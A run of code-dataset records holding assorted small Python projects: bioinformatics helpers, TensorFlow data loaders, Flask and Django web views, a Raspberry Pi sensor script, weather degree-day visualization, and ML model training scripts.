GetChainID(fastaName):\n return fastaName[5:6]\n\n\ndef GetFastaNAmeFromFileName(fileName):\n return fileName[:6]\n\n\nCONST_SEC_STR_FOLDER = '../secondary_structures/'\n\n\ndef __makeSecStrName__(rawName):\n return CONST_SEC_STR_FOLDER + rawName + \".secstr\"\n\n\n# expects fastaName like XXXX_A.anything\n# seondary structure is on second line\ndef LoadSecondaryStructure(fastaName):\n rawName = GetFastaNAmeFromFileName(fastaName)\n with open(__makeSecStrName__(rawName), 'r') as file:\n sequence_raw = file.readline()\n sequence = \"\"\n for res in sequence_raw:\n if res.upper() in ('A', 'G', 'C', 'U'):\n sequence += res.upper()\n secondaryStructure_raw = file.readline()\n secondaryStructure = \"\"\n for res in secondaryStructure_raw:\n if res.upper() in ('.', '(', ')', '[', ']'):\n secondaryStructure += res.upper()\n return {'sequence': sequence, 'sec_str': secondaryStructure}\n\n\ndef ListOfPairsToFiles(zeroIndexFileName, listOfPairs):\n fileZero = open(zeroIndexFileName, 'w')\n fileZero.write(\">SEQ:\\n\")\n for pair in listOfPairs:\n fileZero.write(pair[0])\n fileZero.write('\\n')\n for pair in listOfPairs:\n fileZero.write(pair[1])\n fileZero.close()\n\n\n# compare order of fasta file and corresponding pdb file\ndef check_order_of_fasta_and_pdb(input_pdb, chain_id, fasta, fasta_shift=0):\n parser_pdb = PDBParser()\n structure = parser_pdb.get_structure('self', input_pdb)\n model = structure[0]\n chain = model[chain_id]\n records = list(SeqIO.parse(fasta, \"fasta\"))\n fasta_seq = \"\"\n for r in records[0]:\n fasta_seq = fasta_seq + r\n fasta_seq = \"x\"+fasta_seq+\"x\"\n for i in range(0, fasta_shift):\n fasta_seq = \"y\" + fasta_seq\n b = True\n for res in chain:\n if res.id[1] >= len(fasta_seq):\n b = False\n break\n if res.resname[2] != fasta_seq[res.id[1]]:\n b = False\n return b\n\n\n# select only ATOM lines with correct chain_id to template\ndef select_relevant_chain_from_template_pdb(pdb, chain_id):\n import re\n with open(\"template.pdb\", \"wb\") as modified_pdb:\n with open(pdb, 'r') as original_pdb:\n for line in original_pdb.readlines():\n if re.match('ATOM.................'+chain_id, line):\n modified_pdb.write(line)\n\n\n\ndef load_fasta(fasta_file):\n from Bio import SeqIO\n FastaFile = open(\"../fastas/\" + fasta_file.upper() + \".fasta\", 'rU')\n for rec in SeqIO.parse(FastaFile, 'fasta'):\n name = rec.id\n seq = rec.seq\n seqLen = len(rec)\n FastaFile.close()\n return seq\n\n\n\n# Inserts new inside original at pos.\ndef insert_char_to_str(original, new, pos):\n return original[:pos] + new + original[pos:]\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n","repo_name":"galvaner/Trooper","sub_path":"Predictor/scripts/Helper.py","file_name":"Helper.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"745373137","text":"\"\"\"This module provides loaders for dataset such as cifar.\"\"\"\nimport os\nimport tensorflow as tf\n\n\ndef _cifar10_parser_fn(image_width, image_height, with_label):\n \"\"\"Get Cifar10 sample parser function.\"\"\"\n\n def parser(value):\n value = tf.io.decode_raw(value, tf.uint8)\n image = tf.reshape(value[1:], [3, 32, 32])\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.transpose(image, [1, 2, 0])\n if image_width != 32 or image_height != 32:\n image = tf.image.resize([image], [image_height, image_width])[0]\n image.set_shape([image_height, image_width, 3])\n if with_label:\n return image, tf.cast(value[0], tf.int32)\n return image\n\n return parser\n\n\ndef _get_cifar10_files(data_dir):\n \"\"\"Get binary files in folder.\"\"\"\n return [os.path.join(data_dir, f\"data_batch_{i}.bin\") for i in range(1, 6)]\n\n\ndef get_cifar10_labeled_train_ds(data_dir, image_width, image_height):\n \"\"\"Load labeled cifar10 dataset for training.\"\"\"\n num_samples = 4000\n filenames = _get_cifar10_files(data_dir)\n record_bytes = 1 + (3 * 32 * 32)\n dataset = tf.data.FixedLengthRecordDataset(filenames, record_bytes)\n dataset = dataset.take(num_samples)\n dataset = dataset.map(_cifar10_parser_fn(image_width, image_height, True), num_parallel_calls=tf.data.experimental.AUTOTUNE)\n return dataset, num_samples\n\n\ndef get_cifar10_unlabeled_train_ds(data_dir, image_width, image_height):\n \"\"\"Load unlabeled cifar10 dataset for training.\"\"\"\n filenames = _get_cifar10_files(data_dir)\n record_bytes = 1 + (3 * 32 * 32)\n dataset = tf.data.FixedLengthRecordDataset(filenames, record_bytes)\n dataset = dataset.map(_cifar10_parser_fn(image_width, image_height, False), num_parallel_calls=tf.data.experimental.AUTOTUNE)\n return dataset\n\n\ndef get_cifar10_val_ds(data_path, image_width, image_height):\n \"\"\"Load cifar10 dataset for validation.\"\"\"\n filenames = [os.path.join(data_path, \"test_batch.bin\")]\n record_bytes = 1 + (3 * 32 * 32)\n dataset = tf.data.FixedLengthRecordDataset(filenames, record_bytes)\n dataset = dataset.map(_cifar10_parser_fn(image_width, image_height, True), num_parallel_calls=tf.data.experimental.AUTOTUNE)\n return dataset\n","repo_name":"retoschiegg/meta-pseudo-labels","sub_path":"src/utils/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"44"} +{"seq_id":"13431020483","text":"from flask import Flask, request, jsonify, render_template\nfrom dotenv import load_dotenv\nimport openai\nimport os\nimport io\nimport datetime\nfrom ._utils.firebase_utils import add_data, get_data, set_data\n# comment\napp = Flask(__name__)\n\nMODELS = ['gpt-3.5-turbo', 'gpt-3.5-turbo-16k']\n\ndef completion_text(c):\n return c[\"choices\"][0][\"message\"][\"content\"]\n\ndef write_gpt_log(filename, response, instructions, transcript):\n instructions = \"\" if instructions is None else instructions\n output = ''\n output+=response\n output+=\"\\n\\n\\n\\n\\n\\n-------SYSTEM--------\\n\"\n output+=instructions\n output+=\"\\n\\n\\n\\n\\n\\n-------USER--------\\n\"\n output+=transcript\n add_data('logs',{'output': output})\n\n\n#region Random Helper Functions\ndef read_ref(file):\n filepath = os.path.join(\"backend\", \"refs\", file)\n with open(filepath, \"r\") as f:\n output = f.read()\n return output\ndef read_message(file):\n filepath = os.path.join(\"messages\", file)\n with open(filepath, \"r\") as f:\n output = f.read()\n return output\n#endregion\n\ndef gpt(model_num, sys,usr, log_name):\n print('GPT Called: ' + MODELS[model_num])\n\n if sys is not None:\n completion = openai.ChatCompletion.create(\n model=MODELS[model_num], \n messages=[\n {\"role\": \"system\", \"content\": sys},\n {\"role\": \"user\", \"content\": usr}\n ]\n )\n else: \n completion = openai.ChatCompletion.create(\n model=MODELS[model_num], \n messages=[\n {\"role\": \"user\", \"content\": usr}\n ]\n )\n write_gpt_log(log_name, completion_text(completion), sys, usr)\n return completion\n\n@app.route('/api/processes/main')\ndef process():\n pass\n\n@app.route('/api/processes/test')\ndef test():\n load_dotenv()\n system = read_message('01_system')\n\n openai.api_key = os.getenv('API_KEY')\n add_data(\"test\",{\"Test\": \"Value\"})\n response = completion_text(gpt(0, \"You are a summarizer. Summarizer whatever you see, whether it be a question or document\", system, \"lognameirrelevant\"))\n add_data(\"test\", {\"conversion_result\":response})\n return jsonify({'message': 'Job starting', 'response':system})\n\n@app.route('/api/openai')\ndef about():\n return jsonify({'message': 'OpenAI Test'})","repo_name":"ryanmyang/Customizable_AI_Summarizer","sub_path":"frontend/ai-summarizer-ui/api/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73539035654","text":"from app import app, create_connection, get_airports\nfrom flask import request, jsonify\n\n\n@app.route(\"/_get_airports\", methods=[\"GET\"])\ndef return_airports():\n def _format_string(city, code):\n return \"{city} ({code})\".format(city=city, code=code)\n\n airports = get_airports()\n airport = str(request.args.get(\"airport\"))\n\n if not airport:\n return \"OK\"\n\n airports = {airport[\"code\"]: airport[\"city\"] for airport in airports}\n\n query = \"\"\"\n SELECT DISTINCT from_airport, GROUP_CONCAT(DISTINCT to_airport ORDER BY to_airport SEPARATOR \",\") as to_airport\n FROM flight\n WHERE from_airport=%s\n GROUP BY from_airport\n \"\"\"\n\n cnx = create_connection()\n cursor = cnx.cursor()\n cursor.execute(query, airport)\n route = cursor.fetchone()\n cursor.close()\n cnx.close()\n\n destinations = [\n {\"value\": code, \"text\": _format_string(airports[code], code)}\n for code in route[\"to_airport\"].split(\",\")\n ]\n\n return jsonify(result=destinations)\n","repo_name":"STiXzoOR/up-flightfinder","sub_path":"app/routes/airport.py","file_name":"airport.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"1837696059","text":"import numpy as np \nimport pandas as pd \n\ndef costFunction(X, y, theta, m):\n\n\t#hypothesis\n\tHx = X.dot(theta)\n\t#calculating mean square error\n\tdiff = np.subtract(Hx, y)\n\tsquareError = np.square(diff)\n\ttotalError = np.sum(squareError)\n\tJ = (1.0/float(2 * m)) * totalError\n\n\treturn J","repo_name":"sleepy0owl/LinearReg","sub_path":"costFunction.py","file_name":"costFunction.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43663658703","text":"#!/usr/bin/env python\nimport time\nimport RPi.GPIO as GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\npir = 5\npled = 12\nGPIO.setup(pir, GPIO.IN)\nGPIO.setup(pled, GPIO.OUT)\nif (GPIO.input(pir)):\n print(\"1\")\n GPIO.output(pled, GPIO.HIGH)\n # mouvement\nelse:\n print(\"0\")\n # pas de mouvement\n GPIO.output(pled, GPIO.LOW)\n","repo_name":"achorein/jeedom-rpi-scripts","sub_path":"readMvt.py","file_name":"readMvt.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24015471085","text":"# encoding: utf-8\r\nimport pymongo\r\nfrom bson.objectid import ObjectId\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom realblog.func import connect_blog_database, render_admin_and_back, redirect\r\n\r\n__author__ = '在何方'\r\n\r\ndef show_all(request):\r\n db = connect_blog_database(request)\r\n info = db.infos.find_one()\r\n categories = list(db.categories.find(sort=[('Order', pymongo.ASCENDING)]))\r\n for category in categories:\r\n category['Id'] = str(category['_id'])\r\n\r\n return render_admin_and_back(request, 'show-categories.html', {\r\n 'page':u'分类',\r\n 'categories':categories,\r\n 'selection':'categories',\r\n })\r\n\r\n@csrf_exempt\r\ndef new(request):\r\n\r\n db = connect_blog_database(request)\r\n\r\n # 普通访问\r\n if request.method == 'GET':\r\n return render_admin_and_back(request, 'edit-category.html', {\r\n 'page':u'新分类',\r\n })\r\n\r\n elif request.method == 'POST':\r\n\r\n d = request.POST\r\n order = int(d['category-order']) if d['category-order'] else 0\r\n update = {\r\n 'Title':d['category-title'],\r\n 'Description':d['category-description'],\r\n 'Order': order,\r\n }\r\n # 插入新的Category\r\n db.categories.insert(update)\r\n\r\n # 对链接重新排序\r\n categories = list(db.categories.find(sort=[('Order', pymongo.ASCENDING)]))\r\n for i in xrange(0, len(categories)):\r\n if categories[i]['Order'] != i:\r\n db.categories.update(categories[i], {\"$set\":{'Order': i}})\r\n\r\n return redirect(request, '新建分类成功', 'admin/show-categories/')\r\n\r\ndef update_category_of_articles(coll, old_cat, new_cat):\r\n \"\"\"\r\n 更新文章集合的分类\r\n \"\"\"\r\n old = old_cat['Title']\r\n new = new_cat['Title']\r\n if old != new:\r\n for a in coll.find({'Categories': old}):\r\n array = a['Categories']\r\n array[array.index(old)] = new\r\n coll.update({'Id': a['Id']}, {'$set': {'Categories': array}})\r\n\r\n@csrf_exempt\r\ndef edit(request, objectId):\r\n\r\n db = connect_blog_database(request)\r\n id = ObjectId(objectId)\r\n\r\n # 普通访问\r\n if request.method == 'GET':\r\n\r\n category = db.categories.find_one({'_id':id})\r\n return render_admin_and_back(request, 'edit-category.html', {\r\n 'page':u'编辑分类',\r\n 'category': category,\r\n })\r\n\r\n elif request.method == 'POST':\r\n\r\n d = request.POST\r\n order = int(d['category-order']) if d['category-order'] else 0\r\n update = {\r\n 'Title':d['category-title'],\r\n 'Description':d['category-description'],\r\n 'Order':order,\r\n }\r\n # 取得所有Category\r\n categories = list(db.categories.find(sort=[('Order', pymongo.ASCENDING)]))\r\n\r\n # 创建或取得编辑中的Category\r\n category = filter(lambda i: i['_id'] == id, categories)[0]\r\n db.categories.update(category, {'$set': update})\r\n categories.remove(category)\r\n categories.insert(order, category)\r\n\r\n # 对所有链接重新排序\r\n for i in xrange(0, len(categories)):\r\n if categories[i]['Order'] != i:\r\n db.categories.update(categories[i], {\"$set\":{'Order': i}})\r\n\r\n # 更新所有文章的分类\r\n update_category_of_articles(db.articles, category, update)\r\n update_category_of_articles(db.hidden_articles, category, update)\r\n\r\n return redirect(request, '编辑分类成功', 'admin/show-categories/')\r\n\r\n@csrf_exempt\r\ndef delete(request, objectId):\r\n\r\n db = connect_blog_database(request)\r\n id = ObjectId(objectId)\r\n\r\n if request.method == 'GET':\r\n\r\n db.categories.remove({'_id':id})\r\n\r\n # 取得所有Category\r\n categories = list(db.categories.find(sort=[('Order', pymongo.ASCENDING)]))\r\n\r\n # 对所有链接重新排序\r\n for i in xrange(0, len(categories)):\r\n if categories[i]['Order'] != i:\r\n db.categories.update(categories[i], {\"$set\":{'Order': i}})\r\n\r\n return redirect(request, '删除分类成功', 'admin/show-categories/')","repo_name":"kailunio/RealBlog","sub_path":"realblog/admin/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"44"} +{"seq_id":"25887471589","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 现有面包、热狗、番茄酱、芥末酱以及洋葱,数字显示有多少种订购组合\n# 其中面包必订,0不订,1订,比如10000,表示只订购面包\n\nimport pprint\n\ncount = 0\nfor bread in[1]:\n for hotdog in[0,1]:\n for ketchup in[0,1]:\n for wasabi in[0,1]:\n for onion in[0,1]:\n print(bread,hotdog,ketchup,wasabi,onion)\n count += 1\nprint(\"There are \",count,\" kinds of type!\")","repo_name":"maohaoyang369/Python_exercise","sub_path":"090.现有面包、热狗、番茄酱、芥末酱以及洋葱,数字显示有多少种订购组合.py","file_name":"090.现有面包、热狗、番茄酱、芥末酱以及洋葱,数字显示有多少种订购组合.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"38368541656","text":"class Stack:\n\n def __init__(self):\n self.stack = []\n\n def push (self, value):\n self.stack.append(value)\n\n def pop (self):\n return self.stack.pop(len (self.stack) - 1)\n\ninp = input ()\ninplst = inp.split()\nstack = Stack ()\nfor inp in inplst:\n if inp[1:].isdigit() and inp[0] == '-':\n inp = -1 * eval (inp[1:])\n elif inp.isdigit():\n inp = eval (inp)\n if (type(inp) != int) and (inp != '+') and (inp != '-') and (inp != '*'):\n continue\n if type(inp) == int:\n stack.push(inp)\n else:\n a = stack.pop()\n b = stack.pop()\n if inp == '+':\n a = b + a\n stack.push (a)\n elif inp == '-':\n a = b - a\n stack.push (a)\n else:\n a = b * a\n stack.push (a)\n\nprint (stack.pop ())\n","repo_name":"zvonand/sem3_python","sub_path":"hw8/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25919340106","text":"from pyepw.epw import EPW\nimport csv\nimport re\nimport json\nimport dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport os\nimport plotly.graph_objs as go\nimport pandas as pd\n\n## read epw file names\ndef ReadFileNameInCsv(dir):\n '''\n This function reads the file names stored in a .csv file\n :param dir: This is the path to the directory in which the csv files are located (relative to the working directory)\n :return: A list object in which each element is a file name as a string\n '''\n with open(dir, 'rt') as f:\n filename_list = []\n for i in csv.reader(f):\n for j in i:\n filename_list.append(j)\n if j is None: break\n if i is None: break\n return filename_list\ndef CalTempHoursInRanges(thresh1:float, thresh2, thresh3, thresh4, drybulb):\n Hour1, Hour2, Hour3, Hour4, Hour5 = 0, 0, 0, 0, 0\n for DBT in drybulb:\n if DBT < thresh1:\n Hour1 += 1\n elif DBT < thresh2:\n Hour2 += 1\n elif DBT < thresh3:\n Hour3 += 1\n elif DBT < thresh4:\n Hour4 += 1\n else:\n Hour5 += 1\n hourlist ={}\n hourlist[str(thresh1)]= Hour1\n hourlist[str(thresh2)] = Hour2\n hourlist[str(thresh3)] = Hour3\n hourlist[str(thresh4)] = Hour4\n return hourlist\ndef CddHddCal(drybulb, Tbase):\n '''\n This function calculates the cdd and hdd from hourly drybulb temperature, in this case, the hourly data are derived from epw files\n :param drybulb: the hourly drybulb temperature data\n :param Tbase: The base temperature to calculate the cdd hdd results\n :return: This function returns a dictionary of cdd and hdd results\n '''\n Hdd = 0.0\n Cdd = 0.0\n Tmax = []\n Tmin = []\n DegreeDay = {}\n for i in range(0,365):\n dailydb = []\n for j in range(0,24):\n dailydb.append(drybulb[i*24+j])\n Tmax.append(max(dailydb))\n Tmin.append(min(dailydb))\n #print (Tmax[i])\n if Tmin[i] > Tbase :\n Hdd += 0.0\n Cdd += (Tmax[i] +Tmin[i])/2.0 - Tbase\n elif (Tmin[i] + Tmax[i])/2.0 > Tbase:\n Hdd += (Tbase -Tmin[i])/4.0\n elif Tmax[i]>=Tbase:\n Hdd +=(Tbase-Tmin[i])/2.0-(Tmax[i]-Tbase)/4.0\n elif Tmax[i] < Tbase:\n Hdd += Tbase- (Tmax[i]+Tmin[i])/2.0\n\n if Tmax[i] 0:\n CZdata = re.findall('\"([^\"]*)\"', CZ)[0]\n for i in CZdata:\n if i.isdigit():\n if CZdata not in czlist:\n czlist.append(CZdata)\n Cdd[CZdata], Hdd[CZdata], Station[CZdata] = [],[] ,[]\n ##Parse the climate zone information in .stat, \n #and create new dictionaries for the climate zone\n \n LocCddDICT[location] = int(CddHddCal(drybulb, TempBaseline).get('Cdd'))\n LocHddDICT[location] = int(CddHddCal(drybulb, TempBaseline).get('Hdd'))\n ##Calculate the cdd and hdd for files with this information \n #and store the results in dictionaries\n \n Cdd[CZdata].append(LocCddDICT.get(location))\n Hdd[CZdata].append(LocHddDICT.get(location))\n Station[CZdata].append(location)\n ##Add the results to dictionaries by climate zones \n print('Reading and calculating ' + location+' done!')\n\n##put data into Pandas DataFrame and output to .csv files\nCddY, HddY, StationX,df = [],[],[],[]\nfor i in range(0,len(czlist)):\n CddY.append(Cdd.get(czlist[i]))\n HddY.append(Hdd.get(czlist[i]))\n StationX.append(Station.get(czlist[i]))\n Cddseries = Cdd.get(czlist[i])\n Hddseries = Hdd.get(czlist[i])\n StationSeries = pd.Series(StationX[i])\n dfitem = pd.DataFrame(dict(Cdd=Cddseries, Hdd=Hddseries), index=StationSeries)\n dfitemSort = dfitem.sort_values(by=['Hdd'])\n df.append( dfitemSort)\n dfitemSort.to_csv(path_or_buf='C:\\\\Users\\\\yueyue.zhou\\\\Desktop\\\\CddHdd-'+czlist[i]+'.csv')\nprint(df[2])\n'''\n\n##Read CddHdd files from .csv\n\npath = 'C:\\\\Users\\\\yueyue.zhou\\\\Desktop\\\\CddHddByClimateZone\\\\'\n\n#Read Climate Zone Names from FileNames, and put data to pds dataframe\nCZLs = os.listdir(path)\nCzList,df= [],[]\nHeaders = ['Station', 'Cdd','Hdd']\nfor FileName in CZLs:\n CZInf = FileName.split('-')[-1]\n CZ = CZInf.split('.')[0]\n CzList.append(CZ)\n #parse the filename to get Climatezone names only\n labels = []\n #put data to pds dataframe\n dfitem = pd.read_csv(path + FileName,skiprows = 1, names = Headers, index_col=0)\n\n #Acsending the data in df by hdd( or cdd)\n #dfitemSort = dfitem.sort_values(by=['Hdd'])\n dfitemSort = dfitem.sort_values(by=['Cdd'])\n\n StationList = dfitemSort.index.tolist()\n for station in StationList:\n label = station.split('_')[1:-1]\n label2 = '.'.join(label)[:'.'.join(label).rfind('.')]\n if label2 not in labels:\n labels.append(label2)\n else:\n dfitemSort = dfitemSort.drop(station)\n ##Read and parse the station name, drop the repeating stations\n\n\n LabelCol = pd.Series(labels,index = dfitemSort.index)\n dfitemSort['Label'] = LabelCol\n df.append(dfitemSort)\n\n##plot with Dash\napp = dash.Dash()\napp.layout = html.Div(children = [\n html.H1(children = 'HddCdd Data Visualization'),\n dcc.Graph(\n id='graph-with-slider'),\n html.Div(),\n dcc.Slider(\n id='ClimateZone-slider',\n min=1,\n max=len(CzList),\n value=1,\n step=1,\n marks={i: CzList[i-1] for i in range(1,len(CzList)+1)},\n included = False,\n )\n])\n\n@app.callback(\n dash.dependencies.Output('graph-with-slider', 'figure'),\n [dash.dependencies.Input('ClimateZone-slider', 'value')])\ndef update_figure(selected_CZ):\n filtered_df = df[selected_CZ-1]\n print(filtered_df)\n traces = []\n traces.append(go.Scatter(\n x= filtered_df['Label'],\n y= filtered_df['Cdd'],\n #text='Cooling Degree Days',\n #mode='markers',\n opacity=0.7,\n marker={\n 'size': 10,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name='Cooling Degree Days',\n ))\n traces.append(go.Scatter(\n x=filtered_df['Label'],\n y=filtered_df['Hdd'],\n #text='Heating Degree Days',\n #mode='markers',\n opacity=0.7,\n marker={\n 'size': 10,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name='Heating Degree Days',\n ))\n return {\n 'data': traces,\n 'layout': go.Layout(\n title = 'Hdd Cdd Data by Climate Zones',\n xaxis={'title': 'Station Name', 'autorange': True},\n yaxis={'title': 'Degree Days (Base Temperature: 65F)', 'autorange': True},\n margin={'l': 100, 'b': 250, 't': 50, 'r': 100},\n legend={'x': 0, 'y': 1.1},\n hovermode='closest',\n height = 800,\n )\n }\n\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"yzhou601/cddhddvisualization","sub_path":"ReadWeatherData.py","file_name":"ReadWeatherData.py","file_ext":"py","file_size_in_byte":9458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26111500166","text":"from xgboost import XGBClassifier\nimport pandas as pd\nfrom os import path\nimport pickle\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.ensemble import RandomForestClassifier\n\n\nclass Model:\n test_size=0.2\n\n def __init__(self, model, name):\n self.model = model\n self.name = name\n\n def evaluate_model(self, X_train, y_train, X_test, y_test):\n y_pred_test = self.model.predict(X_test)\n y_pred_train = self.model.predict(X_train)\n test_accuracy = accuracy_score(y_test, y_pred_test)\n train_accuracy = accuracy_score(y_train, y_pred_train)\n print('Training accuracy: {0:.2f}, evaluation accuracy: {1:.2f}'.format(train_accuracy, test_accuracy))\n\n def fit(self, x_all, y_all):\n x_train, x_test, y_train, y_test = train_test_split(x_all, y_all, test_size=Model.test_size)\n self.model.fit(x_train, y_train)\n self.evaluate_model(x_train, y_train, x_test, y_test)\n\n def fit_all(self, x_all, y_all):\n self.model.fit(x_all, y_all)\n\n def save_model(self, path):\n pickle.dump(self.model, open(path + \"/ai_model_\" + self.name + \".pkl\", \"wb\"))\n\n\nclass LogisticModel(Model):\n def __init__(self):\n super().__init__(LogisticRegression(), \"logit\")\n\n\nclass XGB(Model):\n def __init__(self):\n super().__init__(XGBClassifier(n_estimators=1000), \"xgb\")\n\n def fit(self, x_all, y_all):\n x_train, x_test, y_train, y_test = train_test_split(x_all, y_all, test_size=Model.test_size)\n self.model.fit(x_train, y_train, eval_set = [[x_test, y_test]])\n self.evaluate_model(x_train, y_train, x_test, y_test)\n\n\nclass RandomForest(Model):\n def __init__(self):\n super().__init__(RandomForestClassifier(random_state=1,\n n_estimators=1000), \"forest\")\n\n\nclass MLP(Model):\n def __init__(self):\n super().__init__(MLPClassifier(solver='lbfgs',\n alpha=1e-5,\n hidden_layer_sizes=(28, 32, 5),\n random_state=1), \"mlp\")\n\n\nclass ModelVariant:\n def __init__(self, working_dir, vector_length, data_file_name):\n self.working_dir = working_dir\n self.vector_length = vector_length\n self.data_file_name = data_file_name\n\n def get_data_file_with_path(self):\n return path.join(self.working_dir, self.data_file_name)\n\n\ndef rebuild_models(variants):\n for variant in variants:\n\n features = [\"f\" + str(i) for i in range(0, variant.vector_length - 1)]\n label = [\"action\"]\n\n headers = features + label\n\n df = pd.read_csv(variant.get_data_file_with_path(),\n sep=',',\n header=None,\n names=headers)\n\n print(\"Dataset in {} consists of {} rows (vector length {})\".format(variant.working_dir, len(df), variant.vector_length))\n\n y_train_all = df[\"action\"]\n x_train_all = df.drop(columns=\"action\")\n\n # models = [RandomForest(), LogisticModel(), MLP(), XGB()]\n models = [MLP(), XGB()]\n\n for model in models:\n print(\"{} training started \".format(model.name))\n model.fit(x_train_all, y_train_all)\n model.save_model(variant.working_dir)\n print(\"model: {} - done \".format(model.name))\n\n\n# variants = [ModelVariant(\"4_frames/\", 108, \"train_human.csv\"),\n# ModelVariant(\"2_frames/\", 54, \"train_human.csv\"),\n# ModelVariant(\"1_frame/\", 27, \"train_human.csv\")]\n\nvariants = [ModelVariant(\"1_frame/\", 27, \"train_evo.csv\")]\n\n# variants = [ModelVariant(\"1_frame/\", 27, \"train_evo.csv\")]\n#\n# variants = [ModelVariant(\"1_frame/\", 27, \"train_human.csv\")]\n\nrebuild_models(variants)","repo_name":"maneo/letsplay","sub_path":"03_evolution/models/generate_models.py","file_name":"generate_models.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"21495013536","text":"import models.capacities as capacities\nimport tensorflow as tf\nimport numpy as np\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef write_to_tfrecords(feed_dict_list, filename):\n # Append filename extension\n filename = filename + '.tfrecords'\n\n # Define record writer\n writer = tf.python_io.TFRecordWriter(filename)\n\n # Iterate through feed dict list and write to file\n for example_dict in feed_dict_list:\n # Convert dict entries to features\n feature = {}\n for key in example_dict.keys():\n feat = example_dict[key][0].astype(np.int32)\n feature[key.op.name] = _bytes_feature(tf.compat.as_bytes(feat.tostring()))\n\n # Create example protocol buffer\n example = tf.train.Example(features=tf.train.Features(feature=feature))\n\n # Serialise to string and write to file\n writer.write(example.SerializeToString())\n\n # Close writer\n writer.close()\n\n\ndef read_from_tfrecords(filename_list, feature_size_dict, num_epochs=1, batch_size=8, capacity=32,\n num_threads=1, min_after_dequeue=8):\n # Create feature dict to be populated\n feature = {}\n for key in feature_size_dict.keys():\n feature[key] = tf.FixedLenFeature([], tf.string)\n\n # Create queue from filename list\n filename_queue = tf.train.string_input_producer(filename_list, num_epochs=num_epochs)\n\n # Define reader\n reader = tf.TFRecordReader()\n\n # Read next record\n _, serialized_example = reader.read(filename_queue)\n\n # Decode record\n features = tf.parse_single_example(serialized_example, features=feature)\n\n # Convert strings back to numbers\n tensor_list = []\n for key in features.keys():\n tensor = tf.decode_raw(features[key], tf.int32)\n\n # Reshape\n tensor = tf.reshape(tensor, feature_size_dict[key])\n\n # Append to tensor list\n tensor_list.append(tensor)\n\n # Create batches by randomly shuffling tensors\n batch = tf.train.shuffle_batch(tensor_list, batch_size=batch_size, capacity=capacity, num_threads=num_threads,\n min_after_dequeue=min_after_dequeue)\n\n return batch\n\n\nplaceholders = {\"question\": tf.placeholder(tf.int32, [None, None], name=\"question\"),\n \"question_lengths\": tf.placeholder(tf.int32, [None], name=\"question_lengths\"),\n \"candidates\": tf.placeholder(tf.int32, [None, None], name=\"candidates\"),\n \"support\": tf.placeholder(tf.int32, [None, None, None], name=\"support\"),\n \"support_lengths\": tf.placeholder(tf.int32, [None, None], name=\"support_lengths\"),\n \"answers\": tf.placeholder(tf.int32, [None], name=\"answers\"),\n \"targets\": tf.placeholder(tf.int32, [None, None], name=\"targets\")}\n\nkbp_feed_dicts, _ = capacities.load_data(placeholders, 1, source='kbp', data_type='small_train')\n\nfilename = 'data/tfrecords_test'\n\n# Get sizes\nfeature_size_dict = {}\nfor key in kbp_feed_dicts[0].keys():\n key_name = key.op.name\n size = kbp_feed_dicts[0][key][0].shape\n if size == ():\n feature_size_dict[key_name] = (1,)\n else:\n feature_size_dict[key_name] = size\n\n# Test writing to tfrecords file\nwrite_to_tfrecords(kbp_feed_dicts, filename)\n\nkbp_feed_dicts = None\nkbp_train_data = None\nvocab = None\n\n# Test reading from tfrecords file to make sure everything is fine\nfilename_list = [filename + '.tfrecords']\n\nbatch = read_from_tfrecords(filename_list, feature_size_dict)\n\nwith tf.Session() as sess:\n # Define and run init op\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n sess.run(init_op)\n\n summary_writer = tf.summary.FileWriter('results\\\\tfrecords_experiments\\\\', sess.graph)\n summary_writer.add_graph(sess.graph)\n\n # Create coordinator and queue runner objects\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n for _ in range(10):\n test = sess.run(batch)\n\n 